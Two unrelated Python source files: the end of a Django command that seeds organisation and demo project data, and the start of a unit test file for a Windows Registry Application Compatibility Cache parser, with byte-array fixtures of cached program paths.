id=2,
workflowlevel1=self._workflowlevel1s[3], # 15
sector=self._sectors[5], # 134
sub_sector=[self._sectors[13], self._sectors[83], self._sectors[84]], # [142, 212, 213]
)
factories.WorkflowLevel1Sector(
id=3,
workflowlevel1=self._workflowlevel1s[3], # 15
sector=self._sectors[101], # 230
sub_sector=[self._sectors[10], self._sectors[102], self._sectors[103], self._sectors[104], self._sectors[105]], # [139, 231, 232, 233, 234]
)
factories.WorkflowLevel1Sector(
id=4,
workflowlevel1=self._workflowlevel1s[1], # 10
sector=self._sectors[49], # 178,
sub_sector=[self._sectors[14]], # [143]
)
factories.WorkflowLevel1Sector(
id=5,
workflowlevel1=self._workflowlevel1s[6],
sector=self._sectors[31],
sub_sector=[self._sectors[36], self._sectors[34], self._sectors[32], self._sectors[33], self._sectors[35]],
)
factories.WorkflowLevel1Sector(
id=6,
workflowlevel1=self._workflowlevel1s[6],
sector=self._sectors[109],
sub_sector=[self._sectors[84], self._sectors[98], self._sectors[31]],
)
def _create_workflowteams(self):
factories.WorkflowTeam(
id=1, # 2
workflow_user=self._tolauser_andrew, # 9
workflowlevel1=self._workflowlevel1s[1], # 10
role=self._groups[3], # 3
)
factories.WorkflowTeam(
id=2, # 3
workflow_user=self._tolauser_ninette, # 11
workflowlevel1=self._workflowlevel1s[2], # 11
role=self._groups[3], # 3
)
factories.WorkflowTeam(
id=3, # 4
workflow_user=self._tolauser_andrew, # 9
workflowlevel1=self._workflowlevel1s[2], # 11
role=self._groups[3], # 3
)
factories.WorkflowTeam(
id=4, # 13
workflow_user=self._tolauser_ninette, # 11
workflowlevel1=self._workflowlevel1s[1], # 10
role=self._groups[3], # 3
)
factories.WorkflowTeam(
id=5, # 16
workflow_user=self._tolauser_andrew, # 9
workflowlevel1=self._workflowlevel1s[3], # 15
role=self._groups[3], # 3
)
factories.WorkflowTeam(
id=6, # 17
workflow_user=self._tolauser_ninette, # 11
workflowlevel1=self._workflowlevel1s[3], # 15
role=self._groups[3], # 3
)
def _create_internationalizations(self):
if settings.INTERNATIONALIZATION_RESOURCE_URL:
url_subpath = '/api/internationalization/'
url = urljoin(settings.INTERNATIONALIZATION_RESOURCE_URL,
url_subpath)
response = requests.get(url)
data = json.loads(response.content)
for translation_data in data:
factories.Internationalization(
language=translation_data['language'],
language_file=translation_data['language_file'],)
else:
logger.warn('Translations file could not fetch. '
'INTERNATIONALIZATION_RESOURCE_URL is not set')
def _reset_sql_sequences(self):
"""
After adding to database all rows using hardcoded IDs, the primary key
counter of each table is not autoupdated. This method resets all
primary keys for all affected apps.
"""
os.environ['DJANGO_COLORS'] = 'nocolor'
for app in self.APPS:
buf = StringIO()
call_command('sqlsequencereset', app, stdout=buf)
buf.seek(0)
sql_commands = buf.getvalue().splitlines()
sql_commands_clean = []
for command in sql_commands:
# As we are already inside a transaction thanks to the
# transaction.atomic decorator, we don't need
# the COMMIT and BEGIN statements. If there was some problem
# we are automatically rolling back the transaction.
if command not in ('COMMIT;', 'BEGIN;'):
sql_commands_clean.append(command)
cursor = connection.cursor()
cursor.execute("\n".join(sql_commands_clean))
def _assign_workflowteam_current_users(self):
role = Group.objects.get(name=ROLE_VIEW_ONLY)
wflvl1_0 = WorkflowLevel1.objects.get(
id=DEFAULT_WORKFLOW_LEVEL_1S[0][0])
wflvl1_1 = WorkflowLevel1.objects.get(
id=DEFAULT_WORKFLOW_LEVEL_1S[1][0])
tola_user_ids = TolaUser.objects.values_list('id', flat=True).all()
wfteams_0 = [
WorkflowTeam(workflow_user_id=user_id, role=role,
workflowlevel1=wflvl1_0)
for user_id in tola_user_ids
]
wfteams_1 = [
WorkflowTeam(workflow_user_id=user_id, role=role,
workflowlevel1=wflvl1_1)
for user_id in tola_user_ids
]
WorkflowTeam.objects.bulk_create(wfteams_0)
WorkflowTeam.objects.bulk_create(wfteams_1)
def add_arguments(self, parser):
parser.add_argument('--demo', action='store_true',
help='Loads extra demo data')
parser.add_argument('--restore', action='store_true',
help=('Restores back demo data deleting old '
'previous one (except users)'))
@transaction.atomic
def handle(self, *args, **options):
if not settings.DEFAULT_ORG:
msg = ('A DEFAULT_ORG needs to be set up in the configuration to '
'run the script.')
logger.error(msg)
self.stderr.write("{}\n".format(msg))
raise ImproperlyConfigured(msg)
if options['restore']:
self.stdout.write('Clearing up database')
self._clear_database()
self.stdout.write('Creating basic data')
self._create_organization()
self._create_site()
self._create_groups()
self._create_countries()
self._create_sectors()
self._create_indicator_types()
self._create_internationalizations()
if options['demo'] or options['restore']:
self.stdout.write('Creating demo data')
try:
self._create_users()
self._create_site_profiles()
self._create_stakeholders()
self._create_milestones()
self._create_workflow_1s()
self._create_workflow_2s()
self._create_levels()
self._create_frequencies()
self._create_indicators()
self._create_periodic_targets()
self._create_collected_data()
self._create_workflowlevel1_sectors()
self._create_workflowteams()
except (IntegrityError, ValidationError):
msg = ("Error: the data could not be populated in the "
"database. Check that the affected database tables are "
"empty.")
logger.error(msg)
self.stderr.write("{}\n".format(msg))
raise
self.stdout.write('Resetting SQL sequences')
self._reset_sql_sequences()
if options['restore']:
self.stdout.write('Assigning current users to created projects')
self._assign_workflowteam_current_users()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for the Application Compatibility Cache collector."""
import unittest
from dfwinreg import definitions as dfwinreg_definitions
from dfwinreg import fake as dfwinreg_fake
from dfwinreg import registry as dfwinreg_registry
from winregrc import appcompatcache
from winregrc import output_writers
from tests import test_lib
_CACHE_DATA_WINDOWS_XP = bytes(bytearray([
0xef, 0xbe, 0xad, 0xde, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x3f, 0x00, 0x3f, 0x00, 0x5c, 0x00,
0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00, 0x49, 0x00, 0x4e, 0x00,
0x44, 0x00, 0x4f, 0x00, 0x57, 0x00, 0x53, 0x00, 0x5c, 0x00, 0x73, 0x00,
0x79, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00, 0x6d, 0x00, 0x33, 0x00,
0x32, 0x00, 0x5c, 0x00, 0x68, 0x00, 0x74, 0x00, 0x69, 0x00, 0x63, 0x00,
0x6f, 0x00, 0x6e, 0x00, 0x73, 0x00, 0x2e, 0x00, 0x64, 0x00, 0x6c, 0x00,
0x6c, 0x00, 0x00, 0x00, 0x44, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x6e, 0x00,
0x6c, 0x00, 0x6f, 0x00, 0x61, 0x00, 0x64, 0x00, 0x5c, 0x00, 0x62, 0x00,
0x37, 0x00, 0x66, 0x00, 0x30, 0x00, 0x62, 0x00, 0x32, 0x00, 0x38, 0x00,
0x39, 0x00, 0x32, 0x00, 0x62, 0x00, 0x32, 0x00, 0x31, 0x00, 0x32, 0x00,
0x31, 0x00, 0x31, 0x00, 0x61, 0x00, 0x35, 0x00, 0x36, 0x00, 0x33, 0x00,
0x30, 0x00, 0x35, 0x00, 0x31, 0x00, 0x38, 0x00, 0x64, 0x00, 0x30, 0x00,
0x35, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00, 0x38, 0x00, 0x64, 0x00,
0x39, 0x00, 0x5c, 0x00, 0x75, 0x00, 0x70, 0x00, 0x64, 0x00, 0x61, 0x00,
0x74, 0x00, 0x65, 0x00, 0x5c, 0x00, 0x75, 0x00, 0x70, 0x00, 0x64, 0x00,
0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x2e, 0x00, 0x65, 0x00, 0x78, 0x00,
0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0xe9, 0x54, 0x2b, 0x7a, 0xc4, 0x01,
0x00, 0xae, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0xd3, 0x0e, 0xc7,
0xe9, 0x39, 0xca, 0x01
]))
_CACHE_DATA_WINDOWS_2003 = bytes(bytearray([
0xfe, 0x0f, 0xdc, 0xba, 0x01, 0x00, 0x00, 0x00, 0x72, 0x00, 0x74, 0x00,
0x20, 0x00, 0x00, 0x00, 0x00, 0x35, 0x86, 0x76, 0x44, 0xf2, 0xc2, 0x01,
0x00, 0x20, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x3f, 0x00,
0x3f, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00,
0x49, 0x00, 0x4e, 0x00, 0x44, 0x00, 0x4f, 0x00, 0x57, 0x00, 0x53, 0x00,
0x5c, 0x00, 0x4d, 0x00, 0x69, 0x00, 0x63, 0x00, 0x72, 0x00, 0x6f, 0x00,
0x73, 0x00, 0x6f, 0x00, 0x66, 0x00, 0x74, 0x00, 0x2e, 0x00, 0x4e, 0x00,
0x45, 0x00, 0x54, 0x00, 0x5c, 0x00, 0x46, 0x00, 0x72, 0x00, 0x61, 0x00,
0x6d, 0x00, 0x65, 0x00, 0x77, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x6b, 0x00,
0x5c, 0x00, 0x76, 0x00, 0x31, 0x00, 0x2e, 0x00, 0x31, 0x00, 0x2e, 0x00,
0x34, 0x00, 0x33, 0x00, 0x32, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x6e, 0x00,
0x67, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x2e, 0x00, 0x65, 0x00, 0x78, 0x00,
0x65, 0x00, 0x00, 0x00
]))
_CACHE_DATA_WINDOWS_VISTA = bytes(bytearray([
0xfe, 0x0f, 0xdc, 0xba, 0x01, 0x00, 0x00, 0x00, 0x46, 0x00, 0x48, 0x00,
0x20, 0x00, 0x00, 0x00, 0xc2, 0xfe, 0x87, 0x5e, 0x7b, 0xfe, 0xc6, 0x01,
0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x3f, 0x00,
0x3f, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00,
0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,
0x5c, 0x00, 0x53, 0x00, 0x59, 0x00, 0x53, 0x00, 0x54, 0x00, 0x45, 0x00,
0x4d, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x57, 0x00, 0x49, 0x00,
0x53, 0x00, 0x50, 0x00, 0x54, 0x00, 0x49, 0x00, 0x53, 0x00, 0x2e, 0x00,
0x45, 0x00, 0x58, 0x00, 0x45, 0x00, 0x00, 0x00
]))
_CACHE_DATA_WINDOWS_8_0 = bytes(bytearray([
0x80, 0x00, 0x00, 0x00, 0x2e, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x09, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x4a, 0x01, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x30, 0x74, 0x73,
0x9e, 0x6b, 0x3c, 0x8a, 0x68, 0x00, 0x00, 0x00, 0x52, 0x00, 0x53, 0x00,
0x59, 0x00, 0x53, 0x00, 0x56, 0x00, 0x4f, 0x00, 0x4c, 0x00, 0x5c, 0x00,
0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,
0x73, 0x00, 0x5c, 0x00, 0x53, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00,
0x65, 0x00, 0x6d, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x77, 0x00,
0x62, 0x00, 0x65, 0x00, 0x6d, 0x00, 0x5c, 0x00, 0x57, 0x00, 0x6d, 0x00,
0x69, 0x00, 0x50, 0x00, 0x72, 0x00, 0x76, 0x00, 0x53, 0x00, 0x45, 0x00,
0x2e, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00, 0x43, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0xf0, 0xa4, 0xa4, 0xbc, 0xfc, 0xed, 0xcc, 0x01,
0x00, 0x00, 0x00, 0x00
]))
_CACHE_DATA_WINDOWS_8_1 = bytes(bytearray([
0x80, 0x00, 0x00, 0x00, 0x09, 0x15, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x09, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x46, 0x15, 0x00, 0x00, 0x3a, 0x00, 0x00, 0x00,
0x47, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x38, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0x30, 0x74, 0x73,
0xbc, 0x4c, 0xa0, 0x05, 0x5e, 0x00, 0x00, 0x00, 0x46, 0x00, 0x53, 0x00,
0x59, 0x00, 0x53, 0x00, 0x56, 0x00, 0x4f, 0x00, 0x4c, 0x00, 0x5c, 0x00,
0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,
0x73, 0x00, 0x5c, 0x00, 0x53, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00,
0x65, 0x00, 0x6d, 0x00, 0x33, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x64, 0x00,
0x6c, 0x00, 0x6c, 0x00, 0x68, 0x00, 0x6f, 0x00, 0x73, 0x00, 0x74, 0x00,
0x2e, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00, 0x00, 0x00, 0x7f, 0x00,
0x00, 0x00, 0x00, 0x11, 0x00, 0x01, 0xb5, 0x1f, 0x73, 0x13, 0x34, 0x9f,
0xce, 0x01, 0x00, 0x00, 0x00, 0x00
]))
_CACHE_DATA_WINDOWS_10 = bytes(bytearray([
0x30, 0x00, 0x00, 0x00, 0x0a, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc9, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x31, 0x30, 0x74, 0x73, 0x64, 0x7e, 0xcd, 0xc9, 0xcc, 0x00, 0x00, 0x00,
0x42, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x57, 0x00, 0x69, 0x00,
0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x5c, 0x00,
0x73, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00, 0x6d, 0x00,
0x33, 0x00, 0x32, 0x00, 0x5c, 0x00, 0x4d, 0x00, 0x70, 0x00, 0x53, 0x00,
0x69, 0x00, 0x67, 0x00, 0x53, 0x00, 0x74, 0x00, 0x75, 0x00, 0x62, 0x00,
0x2e, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00, 0x80, 0x99, 0xe3, 0x66,
0x30, 0xd6, 0xcf, 0x01, 0x7c, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x40, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
0x20, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00
]))
_CACHE_DATA_WINDOWS_10_CREATOR = bytes(bytearray([
0x34, 0x00, 0x00, 0x00, 0x1a, 0x4e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x53, 0x07, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x7a, 0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xfa, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x31, 0x30, 0x74, 0x73, 0xd5, 0xf1, 0x23, 0x93,
0xd4, 0x00, 0x00, 0x00, 0x7e, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00,
0x50, 0x00, 0x72, 0x00, 0x6f, 0x00, 0x67, 0x00, 0x72, 0x00, 0x61, 0x00,
0x6d, 0x00, 0x20, 0x00, 0x46, 0x00, 0x69, 0x00, 0x6c, 0x00, 0x65, 0x00,
0x73, 0x00, 0x20, 0x00, 0x28, 0x00, 0x78, 0x00, 0x38, 0x00, 0x36, 0x00,
0x29, 0x00, 0x5c, 0x00, 0x4e, 0x00, 0x56, 0x00, 0x49, 0x00, 0x44, 0x00,
0x49, 0x00, 0x41, 0x00, 0x20, 0x00, 0x43, 0x00, 0x6f, 0x00, 0x72, 0x00,
0x70, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x61, 0x00, 0x74, 0x00, 0x69, 0x00,
0x6f, 0x00, 0x6e, 0x00, 0x5c, 0x00, 0x33, 0x00, 0x44, 0x00, 0x20, 0x00,
0x56, 0x00, 0x69, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6f, 0x00, 0x6e, 0x00,
0x5c, 0x00, 0x6e, 0x00, 0x76, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72, 0x00,
0x65, 0x00, 0x67, 0x00, 0x2e, 0x00, 0x65, 0x00, 0x78, 0x00, 0x65, 0x00,
0xe9, 0x09, 0x99, 0x7b, 0xa8, 0x9e, 0xd2, 0x01, 0x48, 0x00, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x08, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x4c, 0x01, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
0x40, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x20, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00
]))
class TestOutputWriter(output_writers.StdoutOutputWriter):
"""Output writer for testing.
Attributes:
cached_entries (list[AppCompatCacheCachedEntry]): Application Compatibility
Cache cached entries.
"""
def __init__(self):
"""Initializes an output writer object."""
super(TestOutputWriter, self).__init__()
self.cached_entries = []
def WriteCachedEntry(self, cached_entry):
"""Writes the Application Compatibility Cache cached entry to stdout.
Args:
cached_entry (AppCompatCacheCachedEntry): Application Compatibility
Cache cached entry.
"""
self.cached_entries.append(cached_entry)
class AppCompatCacheDataParserTest(test_lib.BaseTestCase):
"""Tests for the Application Compatibility Cache data parser."""
# pylint: disable=protected-access
def testCheckSignature(self):
"""Tests the CheckSignature function."""
parser = appcompatcache.AppCompatCacheDataParser()
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_XP)
self.assertEqual(format_type, parser._FORMAT_TYPE_XP)
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_2003)
self.assertEqual(format_type, parser._FORMAT_TYPE_2003)
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_VISTA)
# TODO: add support to detect Vista format.
self.assertEqual(format_type, parser._FORMAT_TYPE_2003)
# TODO: add Windows 7 test.
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_8_0)
self.assertEqual(format_type, parser._FORMAT_TYPE_8)
format_type = parser.CheckSignature(_CACHE_DATA_WINDOWS_8_1)
